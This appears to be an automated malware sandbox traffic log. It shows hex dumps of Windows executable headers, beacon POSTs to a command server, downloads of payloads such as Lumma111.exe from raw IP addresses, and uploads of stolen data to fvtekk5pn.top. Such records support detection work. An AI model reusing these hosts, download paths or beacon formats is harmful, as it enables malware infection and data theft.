Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 20:09:31 GMTContent-Type: application/octet-streamContent-Length: 1910784Last-Modified: Wed, 20 Nov 2024 19:42:21 GMTConnection: keep-aliveETag: "673e3b9d-1d2800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 e6 72 3b 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 10 04 00 00 be 00 00 00 00 00 00 00 40 4b 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4b 00 00 04 00 00 02 b1 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 70 05 00 70 00 00 00 00 60 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 71 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 60 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 70 05 00 00 02 00 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2b 00 00 80 05 00 00 02 00 00 00 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 6b 78 67 68 68 77 69 00 90 1a 00 00 a0 30 00 00 8e 1a 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6a 65 79 79 78 70 6c 00 10 00 00 00 30 4b 00 00 04 00 00 00 02 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4b 00 00 22 00 00 00 06 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 20:09:39 GMTContent-Type: application/octet-streamContent-Length: 1848320Last-Modified: Wed, 20 Nov 2024 19:42:28 GMTConnection: keep-aliveETag: "673e3ba4-1c3400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 22 01 00 00 00 00 00 00 e0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 6b 00 00 04 00 00 78 76 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2b 00 00 c0 24 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 67 6a 70 6d 6c 72 63 00 a0 1a 00 00 30 50 00 00 96 1a 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 6a 72 70 71 6b 72 70 00 10 00 00 00 d0 6a 00 00 04 00 00 00 0e 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 6a 00 00 22 00 00 00 12 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 20:09:48 GMTContent-Type: application/octet-streamContent-Length: 922624Last-Modified: Wed, 20 Nov 2024 19:40:35 GMTConnection: keep-aliveETag: "673e3b33-e1400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 2b 3b 3e 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 64 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0e 00 00 04 00 00 d6 ff 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 60 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 a8 00 00 00 40 0d 00 00 aa 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 f0 0d 00 00 76 00 00 00 9e 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 20:09:56 GMTContent-Type: application/octet-streamContent-Length: 2768384Last-Modified: Wed, 20 Nov 2024 19:41:02 GMTConnection: keep-aliveETag: "673e3b4e-2a3e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 6b 14 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 79 73 64 6e 6e 65 6d 00 e0 29 00 00 a0 00 00 00 dc 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 76 63 6e 73 67 63 6d 00 20 00 00 00 80 2a 00 00 06 00 00 00 16 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2a 00 00 22 00 00 00 1c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 20:10:02 GMTContent-Type: application/octet-streamContent-Length: 2768384Last-Modified: Wed, 20 Nov 2024 19:41:03 GMTConnection: keep-aliveETag: "673e3b4f-2a3e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 6b 14 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 79 73 64 6e 6e 65 6d 00 e0 29 00 00 a0 00 00 00 dc 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 76 63 6e 73 67 63 6d 00 20 00 00 00 80 2a 00 00 06 00 00 00 16 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2a 00 00 22 00 00 00 1c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 36 32 45 37 36 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B62E76B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 37 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007743001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: GET /files/Lumma111.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 37 34 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007744001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 37 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007745001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 37 34 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007746001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------dOjK09zs8QI4YHDEtGX82bData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 4f 6a 4b 30 39 7a 73 38 51 49 34 59 48 44 45 74 47 58 38 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 69 6b 61 71 69 6c 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 8a 62 f9 ab 11 0c 4e 6a 6a a0 e1 1f 2f d1 a3 1b d8 fc fa ba 37 41 b7 01 b4 66 3e a2 a7 a7 96 85 06 af de 23 10 69 45 a2 9e 0f 11 53 61 1d 69 06 3c 2c d3 c4 49 49 5d c2 3f 14 dc e9 92 a6 77 ee 81 4e 2a 56 3c 7e a7 a2 22 11 5e bf 76 bb 19 a6 ba 76 b9 cf dd be db 1e 79 76 7a bb e4 16 b3 3d 47 8a d7 76 45 c5 22 72 f1 2b 41 a5 ca 56 05 9e 69 6d cc b0 cd 58 44 ed 99 79 af 63 a5 5a 64 87 26 8f da 1e b8 82 ec ee 68 9c d4 47 3b 75 bd 9a 00 80 37 86 f1 b8 0b 96 2f 31 b1 41 1d b0 78 e8 ee ea 1a 21 43 8f d3 98 cb 49 45 6f 07 e9 e1 0f 9f ee 5e fc 12 34 da 5e 36 1b 1d d7 a1 0e f3 0b 6b e4 3a 5a ec 6a 10 4f cb 1d 61 f5 f9 54 dd 80 ff 12 89 79 98 a8 9d 22 21 10 46 92 21 56 a2 59 87 a2 f1 a0 0c 41 4f 76 c7 98 f6 21 07 f1 0c e9 b9 60 b7 87 4f 80 67 91 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 4f 6a 4b 30 39 7a 73 38 51 49 34 59 48 44 45 74 47 58 38 32 62 2d 2d 0d 0a Data Ascii: --------------------------dOjK09zs8QI4YHDEtGX82bContent-Disposition: form-data; name="file"; filename="Likaqila.bin"Content-Type: application/octet-streambNjj/7Af>#iESai<,II]?wN*V<~"^vvyvz=GvE"r+AVimXDycZd&hG;u7/1Ax!CIEo^4^6k:ZjOaTy"!F!VYAOv!`Og--------------------------dOjK09zs8QI4YHDEtGX82b--
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIJEHCBAKFCAKFHCGDGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 41 38 37 43 45 39 36 45 44 32 31 33 38 35 39 31 33 37 30 34 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 2d 2d 0d 0a Data Ascii: ------BFIJEHCBAKFCAKFHCGDGContent-Disposition: form-data; name="hwid"DA87CE96ED213859137049------BFIJEHCBAKFCAKFHCGDGContent-Disposition: form-data; name="build"mars------BFIJEHCBAKFCAKFHCGDG--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 66119Content-Type: multipart/form-data; boundary=------------------------Uns2ElJSnWdBtWLXC3zBG4Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 55 6e 73 32 45 6c 4a 53 6e 57 64 42 74 57 4c 58 43 33 7a 42 47 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4e 61 64 65 62 69 68 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a b9 bf ea 06 f7 47 fc cd 0c be f2 e0 18 3b af 83 a9 d6 1f 24 1b e4 5d e2 87 1a 64 3d 81 d7 f9 5b 30 3f 9d 45 8f 00 49 9d 22 12 1b e6 0d 47 79 73 57 6f d2 1d 87 c5 d2 d4 25 41 4e 9e cf 7b 13 55 f5 6d 